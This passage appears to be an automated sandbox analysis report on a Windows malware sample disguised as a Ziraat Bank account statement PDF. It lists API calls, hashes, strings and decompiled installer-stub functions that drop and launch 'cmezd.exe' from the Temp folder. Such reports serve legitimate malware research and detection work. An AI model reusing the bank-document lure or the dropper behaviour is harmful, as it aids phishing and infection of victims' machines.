                                                                                              0x00000000
                                                                                              0x00403320
                                                                                              0x00000000
                                                                                              0x004032d4
                                                                                              0x00403262
                                                                                              0x00403274
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040315e
                                                                                              0x00403163
                                                                                              0x00403168
                                                                                              0x0040316c
                                                                                              0x00403173
                                                                                              0x0040317a
                                                                                              0x0040317c
                                                                                              0x0040317c
                                                                                              0x00403187
                                                                                              0x004032e0
                                                                                              0x00403322
                                                                                              0x00000000
                                                                                              0x00403322
                                                                                              0x00403194
                                                                                              0x00403214
                                                                                              0x00403218
                                                                                              0x0040321d
                                                                                              0x00000000
                                                                                              0x00403214
                                                                                              0x0040319d
                                                                                              0x004031a2
                                                                                              0x004031aa
                                                                                              0x004031d0
                                                                                              0x004031df
                                                                                              0x004031e5
                                                                                              0x004031ea
                                                                                              0x004031f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031fa
                                                                                              0x00403202
                                                                                              0x00403205
                                                                                              0x0040320a
                                                                                              0x0040320c
                                                                                              0x0040320c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031fa
                                                                                              0x0040321e
                                                                                              0x00403224
                                                                                              0x00403230
                                                                                              0x00403230
                                                                                              0x00403233
                                                                                              0x00403239
                                                                                              0x00403239
                                                                                              0x00403241
                                                                                              0x00000000
                                                                                              0x00403241

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 2803837635-30357905
                                                                                              • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                              • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                              C-Code - Quality: 77%
                                                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                              0x0040176f
                                                                                              0x00401776
                                                                                              0x00401782
                                                                                              0x00401785
                                                                                              0x0040178a
                                                                                              0x0040178d
                                                                                              0x00401794
                                                                                              0x004017b0
                                                                                              0x00401796
                                                                                              0x00401797
                                                                                              0x00401797
                                                                                              0x004017b6
                                                                                              0x004017bb
                                                                                              0x004017bb
                                                                                              0x004017bf
                                                                                              0x004017c2
                                                                                              0x004017c7
                                                                                              0x004017c9
                                                                                              0x004017cb
                                                                                              0x004017d0
                                                                                              0x004017d0
                                                                                              0x004017db
                                                                                              0x004017db
                                                                                              0x004017ec
                                                                                              0x004017ee
                                                                                              0x004017ee
                                                                                              0x004017ef
                                                                                              0x004017ef
                                                                                              0x004017f2
                                                                                              0x004017f5
                                                                                              0x004017f8
                                                                                              0x004017f8
                                                                                              0x004017ff
                                                                                              0x0040180e
                                                                                              0x00401813
                                                                                              0x00401816
                                                                                              0x00401819
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040181b
                                                                                              0x0040181e
                                                                                              0x00401874
                                                                                              0x00401879
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x00402c2d
                                                                                              0x00000000
                                                                                              0x00401820
                                                                                              0x00401826
                                                                                              0x0040182d
                                                                                              0x0040183a
                                                                                              0x00401845
                                                                                              0x0040185b
                                                                                              0x0040185b
                                                                                              0x0040185e
                                                                                              0x00000000
                                                                                              0x00401864
                                                                                              0x00401864
                                                                                              0x00401865
                                                                                              0x00401882
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00401867
                                                                                              0x00401867
                                                                                              0x00401868
                                                                                              0x00401493
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x00401865
                                                                                              0x0040185e
                                                                                              0x00402c35
                                                                                              0x00402c39
                                                                                              0x00402c39
                                                                                              0x00401892
                                                                                              0x00401897
                                                                                              0x004018a5
                                                                                              0x004018aa
                                                                                              0x004018b0
                                                                                              0x004018b4
                                                                                              0x004018b6
                                                                                              0x004018be
                                                                                              0x004018ca
                                                                                              0x004018b8
                                                                                              0x004018b8
                                                                                              0x004018bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004018bc
                                                                                              0x004018d3
                                                                                              0x004018d9
                                                                                              0x004018db
                                                                                              0x00000000
                                                                                              0x004018e1
                                                                                              0x004018e1
                                                                                              0x004018e4
                                                                                              0x004018fc
                                                                                              0x004018e6
                                                                                              0x004018e9
                                                                                              0x004018f2
                                                                                              0x004018f2
                                                                                              0x00401901
                                                                                              0x00401906
                                                                                              0x00402398
                                                                                              0x00000000
                                                                                              0x00402398
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,00000000,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 1941528284-3654730801
                                                                                              • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                              • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                              • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                              • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                              C-Code - Quality: 100%
                                                                                              			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                              0x004069dc
                                                                                              0x004069e5
                                                                                              0x004069e7
                                                                                              0x004069e7
                                                                                              0x004069eb
                                                                                              0x004069fe
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x00406a17
                                                                                              0x00406a2b
                                                                                              0x00406a32

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                              • wsprintfW.USER32 ref: 00406A17
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                              0x00405ba4
                                                                                              0x00405ba8
                                                                                              0x00405bab
                                                                                              0x00405bb1
                                                                                              0x00405bb5
                                                                                              0x00405bb9
                                                                                              0x00405bc1
                                                                                              0x00405bc8
                                                                                              0x00405bce
                                                                                              0x00405bd5
                                                                                              0x00405bdc
                                                                                              0x00405be4
                                                                                              0x00405be6
                                                                                              0x00000000
                                                                                              0x00405be6
                                                                                              0x00405bf0
                                                                                              0x00405bf7
                                                                                              0x00405c0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c0f
                                                                                              0x00405c13

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 3449924974-3916508600
                                                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                              0x0040618d
                                                                                              0x00406193
                                                                                              0x00406194
                                                                                              0x00406194
                                                                                              0x00406199
                                                                                              0x0040619a
                                                                                              0x0040619d
                                                                                              0x004061a2
                                                                                              0x004061a5
                                                                                              0x004061af
                                                                                              0x004061bc
                                                                                              0x004061c0
                                                                                              0x004061c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004061cc
                                                                                              0x00000000
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061d1
                                                                                              0x004061d4
                                                                                              0x004061d4
                                                                                              0x004061d7
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-1968954121
                                                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
